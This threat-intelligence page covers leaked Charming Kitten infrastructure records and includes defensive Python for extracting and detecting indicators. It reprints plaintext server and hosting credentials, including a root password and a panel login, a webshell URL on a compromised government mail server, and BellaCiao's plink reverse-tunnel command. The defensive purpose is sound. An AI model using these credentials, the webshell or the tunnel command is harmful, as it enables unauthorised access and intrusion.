This page contains sensitive operational infrastructure information obtained from Charming Kitten (IRGC-IO Division 1500, Department 40). The data is provided for threat intelligence and defensive purposes only.

Overview

Episode 4 exposed the unified infrastructure spreadsheet Charming Kitten used to document all of its operational servers. Two people are named as its maintainers:
  • MOHAMMAD NAJAFLOO - former senior employee who maintained the infrastructure documentation for years
  • MOHAMMADERFAN HAMIDIAREF - current maintainer, who took over after Najafloo's departure

Excel Spreadsheet Files

The spreadsheet was leaked as CSV exports; the file names appear to follow a workbook-sheet pattern (e.g. workbook 0-SERVICE, sheet Service):
File                      | Description                     | Purpose
0-SERVICE-Service.csv     | Primary infrastructure registry | Hosting services, domains, VPS, SSL certificates and access credentials
1-NET-Sheet1.csv          | Network infrastructure          | Internal network topology and connectivity
0-SERVICE-payment BTC.csv | Payment records                 | Bitcoin payments for infrastructure services
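An added example (not part of the leak and not the group's own tooling): how to pull blockable indicators out of a leaked registry like 0-SERVICE-Service.csv while stripping the credential column before the sheet is shared with other defenders. The CSV below is constructed in the shape the page describes; its column headers, e-mail addresses and passwords are assumptions, and the PROVIDER_DOMAINS set is taken from the providers named on this page so that hosting-portal domains are not mistaken for attacker-controlled infrastructure.

```python
import csv
import io
import ipaddress
import re
from dataclasses import dataclass, field

# Hosting/registrar portals named on this page. In the leaked sheet they appear as
# *providers*, not attacker-controlled infrastructure, so they must not end up on
# a blocklist.
PROVIDER_DOMAINS = {
    "theonionhost.com", "pq.hosting", "modernizmir.net", "namecheap.com",
    "temok.com", "imprezahost.com", "prq.se", "cloudns.net", "namesilo.com",
    "smspva.com", "superbithhost.com", "protonmail.com",
}

IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
DOMAIN = re.compile(r"\b(?:[a-z0-9-]+\.)+[a-z]{2,}\b", re.IGNORECASE)
# <login>:<secret> or <email>:<secret>; URL cells are excluded before this is applied.
CREDENTIAL = re.compile(r"^([A-Za-z0-9._%+-]+(?:@[A-Za-z0-9.-]+)?):(.+)$")

# Constructed sample in the shape of the leaked registry. The column layout is an
# assumption (the page names the file, not its headers); logins and secrets are made up.
SAMPLE_REGISTRY_CSV = """\
Operation,Provider,Domain,IP,Cost,Access,Ticket
Israel Talent,theonionhost.com,,95.169.196.220,$140 (3 months),ops1@example.net:S3cretValue!,#2029
BBM Movement,bill.pq.hosting,bbmovements.com,,€21 (3 months),ops2@example.net:An0therOne,#2030
Cavinet,namecheap.com,cavinet.org,,$60 (3 months),ops3@example.net:Third$ecret,#2016
Abrahams Ax,portal.imprezahost.com,https://95.183.53.24:37065/panel,95.183.53.24,$135,root:Fourth#Secret,#2031
"""


@dataclass
class Extracted:
    ips: set = field(default_factory=set)              # public IPv4 addresses
    domains: set = field(default_factory=set)          # attacker-controlled domains
    provider_domains: set = field(default_factory=set) # hosting portals, kept separate
    sanitized_csv: str = ""                            # sheet with secrets removed


def provider_match(name: str):
    """Return the provider domain `name` equals or is a subdomain of, else None."""
    labels = name.lower().rstrip(".").split(".")
    for i in range(len(labels) - 1):          # stop before the bare TLD
        candidate = ".".join(labels[i:])
        if candidate in PROVIDER_DOMAINS:
            return candidate
    return None


def extract_indicators(csv_text: str) -> Extracted:
    out = Extracted()
    buf = io.StringIO()
    writer = csv.writer(buf, lineterminator="\n")
    for row in csv.reader(io.StringIO(csv_text)):
        clean_row = []
        for cell in row:
            cell = cell.strip()
            is_url = cell.lower().startswith(("http://", "https://"))
            cred = None if is_url else CREDENTIAL.match(cell)
            if cred:
                # Keep the login (useful for attribution), drop the secret, and do
                # not mine credential cells for indicators (the mail domain is not an IOC).
                clean_row.append(f"{cred.group(1)}:[REDACTED]")
                continue
            clean_row.append(cell)
            for m in IPV4.findall(cell):
                try:
                    addr = ipaddress.ip_address(m)
                except ValueError:
                    continue                  # e.g. 300.1.2.3 matched the regex
                if addr.is_global:            # skip RFC1918 victim-internal addresses
                    out.ips.add(str(addr))
            for name in DOMAIN.findall(cell):
                prov = provider_match(name)
                if prov:
                    out.provider_domains.add(prov)
                else:
                    out.domains.add(name.lower())
        writer.writerow(clean_row)
    out.sanitized_csv = buf.getvalue()
    return out


if __name__ == "__main__":
    result = extract_indicators(SAMPLE_REGISTRY_CSV)
    print("block:", sorted(result.ips), sorted(result.domains))
    print("providers (do not block):", sorted(result.provider_domains))
    print(result.sanitized_csv)
```

The split between `domains` and `provider_domains` is the point: a leaked registry lists where infrastructure was bought alongside what it was used for, and only the latter belongs on a blocklist.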

Attack Server Infrastructure

Tunnel Servers

Charming Kitten deployed multiple tunnel servers for maintaining persistent access to compromised networks:
Israel Talent Campaign:
- Provider: theonionhost.com
- IP: 95.169.196.220
- Access: [email protected]:Kh74QjGDq35NtvB
- Cost: $140 (3 months)
- Ticket: #2029

Moses Staff Operations:
- Provider: theonionhost.com
- Assigned IPs: 95.169.196.20, 95.169.196.23, 95.169.196.37
- Access: [email protected]:jgfk&^%hngGJ54*/s+*&%$hggfaD
- Cost: $140
- Ticket: #2023

Web Hosting Infrastructure

The group maintained web hosting accounts for its operations. Each row is one hosting account; the credentials are the provider login, and the e-mail addresses were not recovered from the source (they appear as [email protected]):
Operation      | Provider         | Domain             | Cost           | Credentials
BBM Movement   | bill.pq.hosting  | bbmovements.com    | €21 (3 months) | [email protected]:5U5v6L0s
SecNetDC       | modernizmir.net  | secnetdc.com       | $10            | [email protected]:MXQ8GLX5qg3yEUV
Tecret         | theonionhost.com | tecret.com         | $3             | [email protected]:RN8OiQ6Y(%H0
Dreamy Jobs    | theonionhost.com | dreamy-jobs.com    | $15            | [email protected]:15aB@gd52$kD#
Wazayif Halima | theonionhost.com | wazayif-halima.org | N/A            | [email protected]:n!hnuec?‘9*Pb2D

Abrahams Ax Infrastructure

Dedicated infrastructure for the Abrahams Ax operation:
Server IP: 95.183.53.24
Root Login: root
Root Password: Kcbha6ZsBuTg

aaPanel login URL (a non-default port plus a random entrance path, which is the panel's default obscurity measure): https://95.183.53.24:37065/f63a6767
Panel Username: le6ddou3
Panel Password: 1cafff29

Domain Provider: prq.se (kundcenter.prq.se)
Cost: $100 (1 year)
Access: [email protected]:J7Z4pw-G

Hosting Provider: portal.imprezahost.com
Access: [email protected]:dm4ac2{FgrL#-G
Cost: $135
Auth Token: Ap4VPAqum5qNL

File Storage Servers

The group utilized multiple storage solutions:

Cavinet Infrastructure

Domain: cavinet.org
Registrar: namecheap.com
Registration: 1/12/2022
Cost: $60 (3 months)
Credentials: [email protected]:CMEPZ9WMb8difTw
Ticket: #2016

Hosting: temok.com
Renewal: 2/3/2024
Cost: $45
Ticket: #2017

ProtonMail Storage Accounts

Multiple ProtonMail accounts were used for data exfiltration:
  • Moses Staff: recivestaff:CxZZspFuUfZF3m3-G (€5, Ticket #2041)
  • Israel Talent: Maintained for data collection from compromised targets

SSL Certificate Infrastructure

The group purchased SSL certificates so that its phishing sites presented valid certificates:
Certificate Type   | Provider          | Cost | Account
Comodo PositiveSSL | superbithhost.com | $11  | [email protected]:JHGF&(^T&OYGI

DNS and Domain Management

ClouDNS Infrastructure

Service: cloudns.net
Account: [email protected]:GF675%$^#@6-*GH678f-G
Registration: 25/7/2024
Payment: 1/8/2023 - $21 (as recorded; the payment date precedes the registration date, so one of the two is probably a typo in the sheet)
Ticket: #2056
Alternate Credentials: [email protected]:HG^&%$hg4156-*fsv

Domain Registrars Used

NameCheap

Primary registrar for moses-staff domains (.io, .to)

PRQ.se

Used for .se and .nu domains (Termite.nu, moses-staff.se)

NameSilo

Used for bbmovements.com, dreamy-jobs.com, wazayif-halima.org

ModernizMir.net

Reseller for secnetdc.com and tecret.com domains

WhatsApp and SMS Services

Service: smspva.com
Operation: Termite.nu
Date: 25/8/2022
Cost: $8
Ticket: #2045
Purpose: WhatsApp verification for phishing operations

Infrastructure Timeline

Date (day/month/year) | Action         | Infrastructure
25/8/2022             | SMS service    | WhatsApp verification for Termite.nu
1/12/2022             | Registration   | cavinet.org domain
17/9/2023             | Email setup    | ProtonMail for moses-staff
20/11/2023            | Hosting        | Moses-staff new host on impreza.host
25/2/2024             | Server setup   | Israel-talent hosting on theonionhost.com
20/8/2024             | Deployment     | wazayif-halima.org hosting
25/8/2024             | Infrastructure | Abrahams Ax hosting setup
1/9/2024              | Registration   | Moses-staff domains (.io, .to, .se)

Internal Network Credentials

The following credentials were exposed for the group’s internal infrastructure. These have been included for threat intelligence purposes.

Turkish Foreign Ministry (MFA) Compromised Network

From the eposta.txt file found with the BellaCiao source code. The mail host named below sits under gov.ct.tr, the government domain of the Turkish Republic of Northern Cyprus, so the victim is the TRNC Ministry of Foreign Affairs rather than Turkey's. Victim passwords are redacted; the attacker-chosen tunnel credential is kept as an indicator.
Admin Account: Admin1@MFA
Password: [redacted]

Alternate Account: pfsenselondra@MFA (the name suggests a pfSense firewall account for a London site)
Password: [redacted]

Tunnel Credentials (same <name>/<name>@123! template as the BellaCiao tunnel account below):
Username: ruby
Password: ruby@123!

Backdoor URL: https://eposta.mfa.gov.ct.tr/aspnet_client/system_web/aspnet_client.aspx
(aspnet_client is a writable directory under IIS and Exchange web roots and a common webshell drop location; any unexpected .aspx there warrants inspection)
C2 Server: 212.175.168.58

Internal Network Topology

Internal hosts documented in eposta.txt, with roles as recorded in the leak:
10.20.105.11 - Primary attack staging server
10.20.105.21 - Secondary target
10.20.105.25 - Compromised workstation
10.20.101.17 - Domain controller access
10.20.101.2  - TMG Server (Microsoft Forefront TMG proxy/firewall)
10.20.101.43 - Log collection server
10.20.106.60 - Additional compromised host

Tunnel and Reverse Proxy Configuration

From BellaCiao Variant 2 (iis.ps1). The switches used (-P, -C, -R, -l, -pw) are PuTTY plink's, not OpenSSH's, so the renamed binary below is plink:
# Reverse SSH Tunnel Configuration
Path: C:\ProgramData\Microsoft\Diagnostic\Java Update Services.exe

Command Template:
echo Y | $Path $domain -P 443 -C -R 127.0.0.1:9090:127.0.0.1:49450 -l Israel -pw Israel@123!

echo Y auto-answers plink's host-key prompt; -P 443 puts the SSH session on the HTTPS port; -R makes the attacker's server listen on 127.0.0.1:9090 and forward that port back through the tunnel to the implant's local webserver, so the operator reaches it without any inbound connection to the victim.

Local Webserver: http://127.0.0.1:49450/
Tunnel User: Israel
Tunnel Password: Israel@123!
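As an added detection example (not code from the leak, the malware, or any vendor): the following Python parses process-creation command lines the way a Sysmon Event ID 1 or Security 4688 consumer would, recognises plink's switch syntax regardless of what the binary is called, and scores the reverse-tunnel traits visible in the template above. The sample events are constructed; tunnel.example stands in for the $domain variable, and the benign plink event and the svchost event are assumptions added for contrast.

```python
import shlex
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# plink switches that consume the next token, and bare switches, from PuTTY's
# plink usage text. -pw (password on the command line) has no OpenSSH
# counterpart, so it identifies plink even when the binary has been renamed.
FLAGS_WITH_ARG = {"-P", "-l", "-pw", "-R", "-L", "-D", "-i", "-hostkey",
                  "-proxycmd", "-m", "-load", "-nc"}
BARE_FLAGS = {"-C", "-N", "-ssh", "-batch", "-v", "-T", "-t", "-agent",
              "-noagent", "-a", "-A", "-x", "-X", "-1", "-2", "-4", "-6", "-s"}
WEB_PORTS = {80, 443, 8080, 8443}
# Path fragments a standard user can write to; tooling staged there is suspect.
USER_WRITABLE = ("c:\\programdata\\", "\\appdata\\", "\\temp\\", "c:\\users\\public\\")


@dataclass
class TunnelFinding:
    image: str
    host: Optional[str] = None
    user: Optional[str] = None
    remote_port: Optional[int] = None
    reverse_forwards: List[str] = field(default_factory=list)
    reasons: List[str] = field(default_factory=list)

    def score(self) -> int:
        return len(self.reasons)


def _unquote(tok: str) -> str:
    return tok[1:-1] if len(tok) >= 2 and tok[0] == tok[-1] == '"' else tok


def analyze_command_line(cmdline: str) -> Optional[TunnelFinding]:
    """Return a finding if the command line uses plink syntax, else None."""
    try:
        tokens = [_unquote(t) for t in shlex.split(cmdline, posix=False)]
    except ValueError:
        return None
    if "|" in tokens:   # `echo Y | <binary> ...` wrapper: analyse the piped-to command
        tokens = tokens[len(tokens) - tokens[::-1].index("|"):]
    if not tokens:
        return None
    f = TunnelFinding(image=tokens[0])
    plink_syntax = password_on_cmdline = False
    i = 1
    while i < len(tokens):
        tok = tokens[i]
        if tok in FLAGS_WITH_ARG:
            plink_syntax = True
            val = tokens[i + 1] if i + 1 < len(tokens) else ""
            if tok == "-P" and val.isdigit():
                f.remote_port = int(val)
            elif tok == "-l":
                f.user = val
            elif tok == "-pw":
                password_on_cmdline = True
            elif tok == "-R":
                f.reverse_forwards.append(val)
            i += 2
            continue
        if tok in BARE_FLAGS:
            plink_syntax = True
        elif f.host is None and not tok.startswith("-"):
            f.host = tok                      # first positional argument is the server
        i += 1
    if not plink_syntax:
        return None
    if f.host and "@" in f.host:              # plink also accepts user@host
        user, f.host = f.host.split("@", 1)
        f.user = f.user or user
    if password_on_cmdline:
        f.reasons.append("password passed with -pw (plink-only flag, plaintext in process logs)")
    for spec in f.reverse_forwards:
        f.reasons.append(f"reverse forward -R {spec}: server-side listener reaches a victim-side port")
    if f.remote_port in WEB_PORTS:
        f.reasons.append(f"SSH to port {f.remote_port}, blending with web traffic")
    name = f.image.rsplit("\\", 1)[-1].lower()
    if "plink" not in name and "putty" not in name:
        f.reasons.append(f"plink syntax from a binary named {name!r} (renamed tool)")
    if any(marker in f.image.lower() for marker in USER_WRITABLE):
        f.reasons.append("binary runs from a user-writable path")
    return f


def scan(events: List[Dict[str, str]], min_score: int = 2) -> List[TunnelFinding]:
    findings = []
    for ev in events:
        f = analyze_command_line(ev["CommandLine"])
        if f and f.score() >= min_score:
            findings.append(f)
    return findings


# Constructed events. The first mirrors the BellaCiao template, with
# "tunnel.example" standing in for $domain; the others are benign contrast cases.
SAMPLE_EVENTS = [
    {"Image": r"C:\ProgramData\Microsoft\Diagnostic\Java Update Services.exe",
     "CommandLine": r'cmd.exe /c echo Y | "C:\ProgramData\Microsoft\Diagnostic\Java Update Services.exe" '
                    r'tunnel.example -P 443 -C -R 127.0.0.1:9090:127.0.0.1:49450 -l Israel -pw Israel@123!'},
    {"Image": r"C:\Program Files\PuTTY\plink.exe",   # admin use: key auth, local forward
     "CommandLine": r'"C:\Program Files\PuTTY\plink.exe" -i C:\keys\jump.ppk -N -L 5432:db.corp.example:5432 admin@jump.corp.example'},
    {"Image": r"C:\Windows\System32\svchost.exe",   # no plink syntax at all
     "CommandLine": r"C:\Windows\System32\svchost.exe -k netsvcs -p"},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f.score(), f.image, f.host, f.user, f.reasons)
```

Scoring rather than a single string match matters here: the binary name, the remote port and the password are all under the operator's control, but a reverse forward from a user-writable path with a password on the command line is not something a legitimate admin session looks like.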

Operational Security Failures

Credential Reuse Patterns

The infrastructure spreadsheets reveal multiple operational security failures:
  1. Pattern-based passwords: the victim-side admin credential in eposta.txt follows an obvious construction (a personal name and year with a fixed symbol suffix, repeated twice), and the tunnel accounts reuse one template (Israel / Israel@123!, ruby / ruby@123!)
  2. Credential documentation: every infrastructure credential stored in plaintext spreadsheets, so a single leaked file exposes every account
  3. Email account reuse: the same ProtonMail accounts used across multiple operations, which links those operations to each other
  4. Sequential ticket numbering: provider ticket IDs (#2016 through #2056) order the purchases and expose the operational timeline

Cost Analysis

Total documented infrastructure spending:
  • Hosting Services: ~$500-700 over documented period
  • Domain Registrations: ~$200-300 annually
  • SSL Certificates: ~$50-100
  • SMS Services: ~$10-20
  • Total Estimated: $750-1,000+ for the documented infrastructure (the line items on this page alone sum to roughly $715, counting € at par)

Detection Opportunities

Organizations can use this infrastructure data to:
  • Block or alert on the specific addresses listed above (95.169.196.220, 95.169.196.20, 95.169.196.23, 95.169.196.37, 95.183.53.24, 212.175.168.58); do not block whole /24s, since theonionhost.com is a shared hosting provider and 212.175.168.0/24 is a Turkish ISP range with unrelated customers
  • Monitor for outbound SSH on port 443 to those addresses, and for process command lines carrying plink switches (-R, -l, -pw) from a binary under C:\ProgramData such as Java Update Services.exe
  • Inspect IIS and Exchange servers for unexpected .aspx files under aspnet_client\system_web
  • Detect the credential patterns observed in compromised networks (<name>@123!-style tunnel accounts)
  • Identify phishing domains using similar registration patterns (NameSilo, NameCheap or PRQ.se registrations paired with cheap theonionhost.com hosting)
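An added example, not drawn from the leak itself: an exact-match indicator scanner over constructed key=value log lines, using the addresses, domains and webshell path listed on this page. It shows the two pitfalls of naive matching called out above: blocking whole /24s (line 3 is a same-/24 neighbour of a tunnel server and must not match) and substring domain matching (line 5 embeds cavinet.org as a prefix of an unrelated name and must not match either). The log format, the internal source addresses and the mail.example.org host are made up.

```python
import ipaddress
import re
from typing import List, Optional, Tuple
from urllib.parse import urlsplit

# Indicators from this page: exact addresses and domains, never whole /24s.
IOC_IPS = {
    "95.169.196.220", "95.169.196.20", "95.169.196.23", "95.169.196.37",
    "95.183.53.24", "212.175.168.58",
}
IOC_DOMAINS = {
    "bbmovements.com", "secnetdc.com", "tecret.com", "dreamy-jobs.com",
    "wazayif-halima.org", "cavinet.org", "termite.nu",
    "moses-staff.se", "moses-staff.io", "moses-staff.to",
}
IOC_URL_PATHS = {"/aspnet_client/system_web/aspnet_client.aspx"}

KV = re.compile(r"(\w+)=(\S+)")

# Constructed log lines (not from any real sensor). Line 3 shares a /24 with a
# tunnel server but is not an indicator; line 5 is a look-alike prefix match.
SAMPLE_LOG = [
    "2024-08-26T10:00:01Z event=dns  src=10.20.105.25 query=mail.wazayif-halima.org",
    "2024-08-26T10:00:03Z event=conn src=10.20.105.25 dst=95.169.196.220:443",
    "2024-08-26T10:00:05Z event=conn src=10.20.105.11 dst=95.169.196.100:443",
    "2024-08-26T10:00:07Z event=http src=203.0.113.9 url=https://mail.example.org/aspnet_client/system_web/aspnet_client.aspx",
    "2024-08-26T10:00:09Z event=dns  src=10.20.106.60 query=cavinet.org.lookalike.example",
    "2024-08-26T10:00:11Z event=conn src=10.20.101.17 dst=212.175.168.58:443",
]


def match_ip(value: str) -> bool:
    """Exact match after normalisation; strips an IPv4 :port suffix."""
    host = value.rsplit(":", 1)[0] if value.count(":") == 1 else value
    try:
        return str(ipaddress.ip_address(host)) in IOC_IPS
    except ValueError:
        return False


def match_domain(name: str) -> Optional[str]:
    """Return the IOC domain that `name` equals or is a subdomain of, else None.
    Walking label boundaries (not substrings) is what keeps line 5 from matching."""
    labels = name.lower().rstrip(".").split(".")
    for i in range(len(labels) - 1):
        candidate = ".".join(labels[i:])
        if candidate in IOC_DOMAINS:
            return candidate
    return None


def match_url(url: str) -> Optional[str]:
    """Match on the request path only: the webshell path is the indicator, not the host."""
    path = urlsplit(url).path.lower()
    return path if path in IOC_URL_PATHS else None


def scan_log(lines: List[str]) -> List[Tuple[int, str, str]]:
    hits = []
    for n, line in enumerate(lines, start=1):
        fields = dict(KV.findall(line))
        dst = fields.get("dst")
        if dst and match_ip(dst):
            hits.append((n, "ip", dst.rsplit(":", 1)[0]))
        query = fields.get("query")
        if query and (d := match_domain(query)):
            hits.append((n, "domain", d))
        url = fields.get("url")
        if url and (p := match_url(url)):
            hits.append((n, "url_path", p))
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

Lines 1, 2, 4 and 6 match; 3 and 5 do not. A /24 rule for 95.169.196.0/24 would have flagged line 3 and every other theonionhost.com customer with it.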

References

  • Episode 4 leak: 0-SERVICE-Service.csv - Primary infrastructure documentation
  • Episode 3 leak: eposta.txt - Turkish Foreign Ministry compromise details
  • Episode 3 leak: BellaCiao source code with embedded infrastructure
